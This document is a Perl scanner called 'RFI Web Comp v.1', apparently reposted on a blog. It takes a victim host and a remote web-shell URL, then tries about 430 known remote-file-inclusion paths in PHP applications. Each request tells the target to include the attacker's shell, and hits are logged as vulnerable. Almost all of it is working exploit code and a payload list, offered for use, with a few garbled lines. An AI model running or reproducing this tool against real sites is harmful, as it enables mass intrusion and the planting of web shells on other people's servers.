# RFI Web Comp v.1 - Public Version
# Code by Virangar / bl4ck.sc0rpi0n
# Contact: blackcode.writer[at]yahoo.com
# Ashiyane Digital Security Team
# ...::: Ashiyane [ online resource of security - ????? ????? ? ??? ??? ?????? ?? ??] :::...
use HTTP::Request;
use LWP::UserAgent;
sub lw
{
my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
system ("title RFI Web Comp v.1 - ");
system ("color 02");
}
}
&lw;
print "\t\t############################################# ###################\n\n";
print "\t\t# RFI Web Comp .v1 - Ashiyane Digital Security Team #\n\n";
print "\t\t# by Virangar & bl4ck.sc0rpi0n #\n\n";
print "\t\t############################################# ###################\n\n";
print "Insert host:(ex: http://www.site.com/)\n";
$host=<STDIN>;
chomp $host;
print "\n";
# Si la url no tiene http: al principio
if ( $host !~ /^http:/ ) {
# lo a?adimos
$host = 'http://' . $host;
}
# Si la url no tiene / al final
if ( $host !~ /\/$/ ) {
# lo a?adimos
$host = $host . '/';
}
print "Insert shell:(ex: http://www.site.com/c99.txt)\n";
$shell=<STDIN>;
chomp $shell;
print "\n";
# Si la url no tiene http: al principio
if ( $shell !~ /^http:/ ) {
# lo a?adimos
$shell = 'http://' . $shell;
}
print "Insert string search:(ex: c99shell)\n";
$string=<STDIN>;
chomp $string;
print "\n\n";
print "Your config:\n\n";
print " Victim: $host \n";
print " Url Shell: $shell \n";
print " Search String: $string \n\n";
print "Scan...\n\n";
$vuln1="includes/header.php?systempath=";
$vuln2="amboro/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=";
$vuln3="index.inc.php?PATH_Includes=";
$vuln4="nphp/nphpd.php?nphp_config[LangFile]=";
$vuln5="include/db.php?GLOBALS[rootdp]=";
$vuln6="ashnews.php?pathtoashnews=";
$vuln7="ashheadlines.php?pathtoashnews=";
$vuln8="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln9="demo/includes/init.php?user_inc=";
$vuln10="jaf/index.php?show=";
$vuln11="inc/shows.inc.php?cutepath=";
$vuln12="poll/admin/common.inc.php?base_path=";
$vuln13="pollvote/pollvote.php?pollname=";
$vuln14="sources/post.php?fil_config=";
$vuln15="modules/My_eGallery/public/displayCategory.php?basepath=";
$vuln16="bb_lib/checkdb.inc.php?libpach=";
$vuln17="include/livre_include.php?no_connect=lol&chem_absolu=";
$vuln18="index.php?from_market=Y&pageurl=";
$vuln19="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$vuln20="pivot/modules/module_db.php?pivot_path=";
$vuln21="modules/4nAlbum/public/displayCategory.php?basepath=";
$vuln22="derniers_commentaires.php?rep=";
$vuln23="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$vuln24="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$vuln25="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$vuln26="coppermine/themes/maze/theme.php?THEME_DIR=";
$vuln28="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
$vuln29="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=";
$vuln30="myPHPCalendar/admin.php?cal_dir=";
$vuln31="agendax/addevent.inc.php?agendax_path=";
$vuln32="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$vuln33="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$vuln34="main.php?page=";
$vuln35="default.php?page=";
$vuln36="index.php?action=";
$vuln37="index1.php?p=";
$vuln38="index2.php?x=";
$vuln39="index2.php?content=";
$vuln40="index.php?conteudo=";
$vuln41="index.php?cat=";
$vuln42="include/new-visitor.inc.php?lvc_include_dir=";
$vuln43="modules/agendax/addevent.inc.php?agendax_path=";
$vuln44="shoutbox/expanded.php?conf=";
$vuln45="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln46="pivot/modules/module_db.php?pivot_path=";
$vuln47="library/editor/editor.php?root=";
$vuln48="library/lib.php?root=";
$vuln49="e107/e107_handlers/secure_img_render.php?p=";
$vuln50="zentrack/index.php?configFile=";
$vuln51="main.php?x=";
$vuln52="becommunity/community/index.php?pageurl=";
$vuln53="GradeMap/index.php?page=";
$vuln54="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
$vuln55="calendar/calendar.php?serverPath=";
$vuln56="calendar/functions/popup.php?serverPath=";
$vuln57="calendar/events/header.inc.php?serverPath=";
$vuln58="calendar/events/datePicker.php?serverPath=";
$vuln59="calendar/setup/setupSQL.php?serverPath=";
$vuln60="calendar/setup/header.inc.php?serverPath=";
$vuln61="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=";
$vuln62="zentrack/index.php?configFile=";
$vuln63="pivot/modules/module_db.php?pivot_path=";
$vuln64="inc/header.php/step_one.php?server_inc=";
$vuln65="install/index.php?lng=../../include/main.inc&G_PATH=";
$vuln66="inc/pipe.php?HCL_path=";
$vuln67="include/write.php?dir=";
$vuln68="include/new-visitor.inc.php?lvc_include_dir=";
$vuln69="includes/header.php?systempath=";
$vuln70="support/mailling/maillist/inc/initdb.php?absolute_path=";
$vuln71="coppercop/theme.php?THEME_DIR=";
$vuln72="zentrack/index.php?configFile=";
$vuln73="pivot/modules/module_db.php?pivot_path=";
$vuln74="inc/header.php/step_one.php?server_inc=";
$vuln75="install/index.php?lng=../../include/main.inc&G_PATH=";
$vuln76="inc/pipe.php?HCL_path=";
$vuln77="include/write.php?dir=";
$vuln78="include/new-visitor.inc.php?lvc_include_dir=";
$vuln79="includes/header.php?systempath=";
$vuln80="support/mailling/maillist/inc/initdb.php?absolute_path=";
$vuln81="coppercop/theme.php?THEME_DIR=";
$vuln82="becommunity/community/index.php?pageurl=";
$vuln83="shoutbox/expanded.php?conf=";
$vuln84="agendax/addevent.inc.php?agendax_path=";
$vuln85="myPHPCalendar/admin.php?cal_dir=";
$vuln86="yabbse/Sources/Packages.php?sourcedir=";
$vuln87="dotproject/modules/projects/addedit.php?root_dir=";
$vuln88="dotproject/modules/projects/view.php?root_dir=";
$vuln89="dotproject/modules/projects/vw_files.php?root_dir=";
$vuln90="dotproject/modules/tasks/addedit.php?root_dir=";
$vuln91="dotproject/modules/tasks/viewgantt.php?root_dir=";
$vuln92="My_eGallery/public/displayCategory.php?basepath=";
$vuln93="modules/My_eGallery/public/displayCategory.php?basepath=";
$vuln94="modules/4nAlbum/public/displayCategory.php?basepath=";
$vuln95="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$vuln96="modules/agendax/addevent.inc.php?agendax_path=";
$vuln97="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln98="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln99="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$vuln100="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$vuln101="shoutbox/expanded.php?conf=";
$vuln102="pivot/modules/module_db.php?pivot_path=";
$vuln103="library/editor/editor.php?root=";
$vuln104="library/lib.php?root=";
$vuln105="e107/e107_handlers/secure_img_render.php?p=";
$vuln106="main.php?x=";
$vuln107="main.php?page=";
$vuln108="index.php?meio.php=";
$vuln109="index.php?include=";
$vuln110="index.php?inc=";
$vuln111="index.php?page=";
$vuln112="index.php?pag=";
$vuln113="index.php?p=";
$vuln114="index.php?x=";
$vuln115="index.php?open=";
$vuln116="index.php?visualizar=";
$vuln117="index.php?pagina=";
$vuln118="index2.php?content=";
$vuln119="inc/step_one_tables.php?server_inc=";
$vuln120="GradeMap/index.php?page=";
$vuln121="phpshop/index.php?base_dir=";
$vuln122="admin.php?cal_dir=";
$vuln123="contacts.php?cal_dir=";
$vuln124="convert-date.php?cal_dir=";
$vuln125="album_portal.php?phpbb_root_path=";
$vuln126="mainfile.php?MAIN_PATH=";
$vuln127="dotproject/modules/files/index_table.php?root_dir=";
$vuln128="html/affich.php?base=";
$vuln129="gallery/init.php?HTTP_POST_VARS=";
$vuln130="pm/lib.inc.php?pm_path=";
$vuln131="ideabox/include.php?gorumDir=";
$vuln132="index2.php?includes_dir=";
$vuln133="forums/toplist.php?phpbb_root_path=";
$vuln134="forum/toplist.php?phpbb_root_path=";
$vuln135="admin/config_settings.tpl.php?include_path=";
$vuln136="include/common.php?include_path=";
$vuln137="event/index.php?page=";
$vuln138="forum/index.php?includeFooter=";
$vuln139="forums/index.php?includeFooter=";
$vuln140="forum/bb_admin.php?includeFooter=";
$vuln141="forums/bb_admin.php?includeFooter=";
$vuln142="language/lang_english/lang_activity.php?phpbb_root_path=";
$vuln143="forum/language/lang_english/lang_activity.php?phpbb_root_path=";
$vuln144="blend_data/blend_common.php?phpbb_root_path=";
$vuln145="master.php?root_path=";
$vuln146="includes/kb_constants.php?module_root_path=";
$vuln147="forum/includes/kb_constants.php?module_root_path=";
$vuln148="forums/includes/kb_constants.php?module_root_path=";
$vuln149="classes/adodbt/sql.php?classes_dir=";
$vuln150="agenda.php3?rootagenda=";
$vuln151="agenda2.php3?rootagenda=";
$vuln152="sources/lostpw.php?CONFIG[path]=";
$vuln153="topsites/sources/lostpw.php?CONFIG[path]=";
$vuln154="toplist/sources/lostpw.php?CONFIG[path]=";
$vuln155="sources/join.php?CONFIG[path]=";
$vuln156="topsites/sources/join.php?CONFIG[path]=";
$vuln157="toplist/sources/join.php?CONFIG[path]=";
$vuln158="topsite/sources/join.php?CONFIG[path]=";
$vuln159="public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=";
$vuln160="extras/poll/poll.php?file_newsportal=";
$vuln161="index.php?site_path=";
$vuln162="mail/index.php?site_path=";
$vuln163="fclick/show.php?path=";
$vuln164="show.php?path=";
$vuln165="calogic/reconfig.php?GLOBALS[CLPath]=";
$vuln166="eshow.php?Config_rootdir=";
$vuln167="auction/auction_common.php?phpbb_root_path=";
$vuln168="index.php?inc_dir=";
$vuln169="calendar/index.php?inc_dir=";
$vuln170="modules/TotalCalendar/index.php?inc_dir=";
$vuln171="modules/calendar/index.php?inc_dir=";
$vuln172="calendar/embed/day.php?path=";
$vuln173="ACalendar/embed/day.php?path=";
$vuln174="calendar/add_event.php?inc_dir=";
$vuln175="claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=";
$vuln176="claroline/auth/ldap/authldap.php?includePath=";
$vuln177="docebo/modules/credits/help.php?lang=";
$vuln178="modules/credits/help.php?lang=";
$vuln179="config.php?returnpath=";
$vuln180="editsite.php?returnpath=";
$vuln181="in.php?returnpath=";
$vuln182="addsite.php?returnpath=";
$vuln183="includes/pafiledb_constants.php?module_root_path=";
$vuln184="phpBB/includes/pafiledb_constants.php?module_root_path=";
$vuln185="pafiledb/includes/pafiledb_constants.php?module_root_path=";
$vuln186="auth/auth.php?phpbb_root_path=";
$vuln187="auth/auth_phpbb/phpbb_root_path=";
$vuln188="apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=";
$vuln189="apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=";
$vuln190="infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=";
$vuln191="phpdig/includes/config.php?relative_script_path=";
$vuln192="includes/phpdig/includes/config.php?relative_script_path=";
$vuln193="includes/dbal.php?eqdkp_root_path=";
$vuln194="eqdkp/includes/dbal.php?eqdkp_root_path=";
$vuln195="dkp/includes/dbal.php?eqdkp_root_path=";
$vuln196="include/SQuery/gameSpy2.php?libpath=";
$vuln197="include/global.php?GLOBALS[includeBit]=";
$vuln198="topsites/config.php?returnpath=";
$vuln199="manager/frontinc/prepend.php?_PX_config[manager_path]=";
$vuln200="ubbthreads/addpost_newpoll.php?addpoll=thispath=";
$vuln201="forum/addpost_newpoll.php?thispath=";
$vuln202="forums/addpost_newpoll.php?thispath=";
$vuln203="ubbthreads/ubbt.inc.php?thispath=";
$vuln204="forums/ubbt.inc.php?thispath=";
$vuln205="forum/ubbt.inc.php?thispath=";
$vuln206="forum/admin/addentry.php?phpbb_root_path=";
$vuln207="admin/addentry.php?phpbb_root_path=";
$vuln208="index.php?f=";
$vuln209="index.php?act=";
$vuln210="ipchat.php?root_path=";
$vuln211="includes/orderSuccess.inc.php?glob[rootDir]=";
$vuln212="stats.php?dir[func]=dir[base]=";
$vuln213="ladder/stats.php?dir[base]=";
$vuln214="ladders/stats.php?dir[base]=";
$vuln215="sphider/admin/configset.php?settings_dir=";
$vuln216="admin/configset.php?settings_dir=";
$vuln217="vwar/admin/admin.php?vwar_root=";
$vuln218="modules/vwar/admin/admin.php?vwar_root=";
$vuln219="modules/vWar_Account/includes/get_header.php?vwar_root=";
$vuln220="modules/vWar_Account/includes/functions_common.php?vwar_root2=";
$vuln221="sphider/admin/configset.php?settings_dir=";
$vuln222="admin/configset.php?settings_dir=";
$vuln223="impex/ImpE
ata.php?systempath=";$vuln224="forum/impex/ImpE
ata.php?systempath=";$vuln225="forums/impex/ImpE
ata.php?systempath=";$vuln226="application.php?base_path=";
$vuln227="index.php?theme_path=";
$vuln228="become_editor.php?theme_path=";
$vuln229="add.php?theme_path=";
$vuln230="bad_link.php?theme_path=";
$vuln231="browse.php?theme_path=";
$vuln232="detail.php?theme_path=";
$vuln233="fav.php?theme_path=";
$vuln234="get_rated.php?theme_path=";
$vuln235="login.php?theme_path=";
$vuln236="mailing_list.php?theme_path=";
$vuln237="new.php?theme_path=";
$vuln238="modify.php?theme_path=";
$vuln239="pick.php?theme_path=";
$vuln240="power_search.php?theme_path=";
$vuln241="rating.php?theme_path=";
$vuln242="register.php?theme_path=";
$vuln243="review.php?theme_path=";
$vuln244="rss.php?theme_path=";
$vuln245="search.php?theme_path=";
$vuln246="send_pwd.php?theme_path=";
$vuln247="sendmail.php?theme_path=";
$vuln248="tell_friend.php?theme_path=";
$vuln249="top_rated.php?theme_path=";
$vuln250="user_detail.php?theme_path=";
$vuln251="user_search.php?theme_path=";
$vuln252="invoice.php?base_path=";
$vuln253="cgi-bin//classes/adodbt/sql.php?classes_dir=";
$vuln254="cgi-bin/install/index.php?G_PATH=";
$vuln255="cgi-bin/include/print_category.php?dir=";
$vuln256="includes/class_template.php?quezza_root_path=";
$vuln257="bazar/classified_right.php?language_dir=";
$vuln258="classified_right.php?language_dir=";
$vuln259="phpBazar/classified_right.php?language_dir=";
$vuln260="chat/messagesL.php3?cmd=";
$vuln261="phpMyChat/chat/messagesL.php3?cmd=";
$vuln262="bbs/include/write.php?dir=";
$vuln263="visitorupload.php?cmd=";
$vuln264="modules/center/admin/accounts/process.php?module_path]=";
$vuln265="index.php?template=";
$vuln266="armygame.php?libpath=";
$vuln267="lire.php?rub=";
$vuln268="pathofhostadmin/?page=";
$vuln269="apa_phpinclude.inc.php?apa_module_basedi r=";
$vuln270="index.php?req_path=";
$vuln271="research/boards/encapsbb-0.3.2_fixed/index_header.php?root=";
$vuln272="Farsi1/index.php?archive=";
$vuln273="index.php?archive=";
$vuln274="show_archives.php?template=";
$vuln275="forum/include/common.php?pun_root=";
$vuln276="pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=";
$vuln277="vuln.php?=";
$vuln278="cgi-bin//include/write.php?dir=";
$vuln279="admin/common.inc.php?basepath=";
$vuln280="pm/lib.inc.php?sfx=";
$vuln281="pm/lib.inc.php?pm_path=";
$vuln282="artmedic-kleinanzeigen-path/index.php?id=";
$vuln283="osticket/include/main.php?include_dir=";
$vuln284="include/main.php?config[search_disp]=include_dir=";
$vuln285="phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=";
$vuln286="quick_reply.php?phpbb_root_path=";
$vuln287="zboard/include/write.php?dir=";
$vuln288="admin/plog-admin-functions.php?configbasedir=";
$vuln289="content.php?content=";
$vuln290="q-news.php?id=";
$vuln291="_conf/core/common-tpl-vars.php?confdir=";
$vuln292="votebox.php?VoteBoxPath=";
$vuln293="al_initialize.php?alpath=";
$vuln294="include/db.php?GLOBALS[rootdp]=";
$vuln295="modules/news/archivednews.php?GLOBALS[language_home]=";
$vuln296="protection.php?siteurl=";
$vuln297="modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=";
$vuln298="index2.php?includes_dir=";
$vuln299="classes.php?LOCAL_PATH=";
$vuln300="extensions/moblog/moblog_lib.php?basedir=";
$vuln301="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$vuln302="phpWebLog/include/init.inc.php?G_PATH=";
$vuln303="admin/objects.inc.php4?Server=";
$vuln304="trg_news30/trgnews/install/article.php?dir=";
$vuln305="block.php?Include=";
$vuln306="arpuivo.php?data=";
$vuln307="setup/index.php?GALLERY_BASEDIR=";
$vuln308="include/help.php?base=";
$vuln309="index.php?[Home]=";
$vuln310="block.php?Include=";
$vuln311="examples/phonebook.php?page=";
$vuln312="PHPNews/auth.php?path=";
$vuln313="include/print_category.php?dir=";
$vuln314="skin/zero_vote/login.php?dir=";
$vuln315="skin/zero_vote/setup.php?dir=";
$vuln316="skin/zero_vote/ask_password.php?dir=";
$vuln317="gui/include/sql.php?include_path=";
$vuln318="webmail/lib/emailreader_execute_on_each_page.inc.php?emailread er_ini=";
$vuln319="email.php?login=cer_skin=";
$vuln320="PhotoGal/ops/gals.php?news_file=";
$vuln321="index.php?custom=";
$vuln322="loginout.php?cutepath=";
$vuln323="oneadmin/config.php?path[docroot]=";
$vuln324="xcomic/initialize.php?xcomicRootPath=";
$vuln325="skin/zero_vote/setup.php?dir=";
$vuln326="skin/zero_vote/error.php? dir=";
$vuln327="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$vuln328="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$vuln329="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$vuln330="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$vuln331="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$vuln332="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$vuln333="src/index_overview.inc.php?config[path_src_include]=";
$vuln334="src/index_leftnavbar.inc.php?config[path_src_include]=";
$vuln335="src/index_image.inc.php?config[path_src_include]=";
$vuln336="src/image-gd.class.php?config[path_src_include]=";
$vuln337="src/image.class.php?config[path_src_include]=";
$vuln338="src/album.class.php?config[path_src_include]=";
$vuln339="src/show_random.inc.php?config[path_src_include]=";
$vuln340="src/main.inc.php?config[path_src_include]=";
$vuln341="src/index_passwd-admin.inc.php?config[path_admin_include]=";
$vuln342="yappa-ng/src/index_overview.inc.php?config[path_src_include]=";
$vuln343="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$vuln344="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$vuln345="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$vuln346="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$vuln347="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$vuln348="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$vuln349="src/index_overview.inc.php?config[path_src_include]=";
$vuln350="src/image-gd.class.php?config[path_src_include]=";
$vuln351="src/image.class.php?config[image_module]=";
$vuln352="src/album.class.php?config[path_src_include]=";
$vuln353="src/show_random.inc.php?config[path_src_include]=";
$vuln353="src/main.inc.php?config[path_src_include]=";
$vuln354="includes/db_adodb.php?baseDir=";
$vuln355="includes/db_connect.php?baseDir=";
$vuln356="includes/session.php?baseDir=";
$vuln357="modules/projects/gantt.php?dPconfig[root_dir]=";
$vuln358="modules/projects/gantt2.php?dPconfig[root_dir]=";
$vuln359="modules/projects/vw_files.php?dPconfig[root_dir]=";
$vuln360="modules/admin/vw_usr_roles.php?baseDir=";
$vuln361="modules/public/calendar.php?baseDir=";
$vuln362="modules/public/date_format.php?baseDir=";
$vuln363="modules/tasks/gantt.php?baseDir=";
$vuln364="mantis/login_page.php?g_meta_include_file=";
$vuln365="phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=";
$vuln366="modules/My_eGallery/public/displayCategory.php?basepath=";
$vuln367="dotproject/modules/files/index_table.php?root_dir=";
$vuln368="nukebrowser.php?filnavn=";
$vuln369="bug_sponsorship_list_view_inc.php?t_core _path=";
$vuln370="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$vuln371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";
$vuln372="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$vuln373="includes/calendar.php?phpc_root_path=";
$vuln374="includes/setup.php?phpc_root_path=";
$vuln375="phpBB/admin/admin_styles.php?mode=";
$vuln376="aMember/plugins/db/mysql/mysql.inc.php?config=";
$vuln377="admin/lang.php?CMS_ADMIN_PAGE=";
$vuln378="inc/pipe.php?HCL_path=";
$vuln379="include/write.php?dir=";
$vuln380="becommunity/community/index.php?pageurl=";
$vuln381="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln382="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$vuln383="modules/agendax/addevent.inc.php?agendax_path=";
$vuln384="shoutbox/expanded.php?conf=";
$vuln385="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln386="index.php?page=";
$vuln387="index.php?pag=";
$vuln388="index.php?include=";
$vuln389="index.php?content=";
$vuln390="index.php?cont=";
$vuln391="index.php?c=";
$vuln392="modules/My_eGallery/index.php?basepath=";
$vuln393="modules/newbb_plus/class/forumpollrenderer.php?bbPath=";
$vuln394="journal.php?m=";
$vuln395="index.php?m=";
$vuln396="links.php?c=";
$vuln397="forums.php?m=";
$vuln398="list.php?c=";
$vuln399="user.php?xoops_redirect=";
$vuln400="index.php?id=";
$vuln401="r.php?url=";
$vuln402="CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=";
$vuln403="inc/formmail.inc.php?script_root=";
$vuln404="include/init.inc.php?G_PATH=";
$vuln405="backend/addons/links/index.php?PATH=";
$vuln406="modules/newbb_plus/class/class.forumposts.php?bbPath[path]=";
$vuln407="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$vuln408="protection.php?siteurl=";
$vuln409="htmltonuke.php?filnavn=";
$vuln410="mail_autocheck.php?pm_path=";
$vuln411="index.php?p=";
$vuln412="modules/4nAlbum/public/displayCategory.php?basepath=";
$vuln413="e107/e107_handlers/secure_img_render.php?p=";
$vuln414="include/new-visitor.inc.php?lvc_include_dir=";
$vuln415="community/modules/agendax/addevent.inc.php?agendax_path=";
$vuln416="library/editor/editor.php?root=";
$vuln417="library/lib.php?root=";
$vuln418="zentrack/index.php?configFile=";
$vuln419="pivot/modules/module_db.php?pivot_path=";
$vuln420="myPHPCalendar/admin.php?cal_dir=";
$vuln421="index.php/main.php?x=";
$vuln422="os/pointer.php?url=";
$vuln423="p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=";
$vuln424="db.php?path_local=";
$vuln425="phpGedView/individual.php?PGV_BASE_DIRECTORY=";
$vuln426="index.php?kietu[url_hit]=";
$vuln427="phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=";
$vuln428="Sources/Packages.php?sourcedir=";
$vuln429="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$vuln430="cgi-bin//gadgets/Blog/BlogModel.php?path=";
$vuln431="Gallery/displayCategory.php?basepath=";
$vuln432="load_phplib.php?_PHPLIB[libdir]=";
$vuln433="main_prepend.php?_SERWEB[functionsdir]=";
$vuln434="load_lang.php?_SERWEB[configdir]=";
for ($i=1;$i<435;$i++)
{
$cont=vuln.$i;
chomp $cont;
print "$cont\n";
$final=$host.$$cont."$shell?";
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
if ($response->is_success) {
if( $response->content =~ /$string/){
open(FILE,">>results.txt");
print FILE "$final\n";
close(FILE);
print "-------------------------------------------------\n";
print "$final\n";
print "IS VULNZ..\n";
print "-------------------------------------------------\n";
}}
}
Nenhum comentário:
Postar um comentário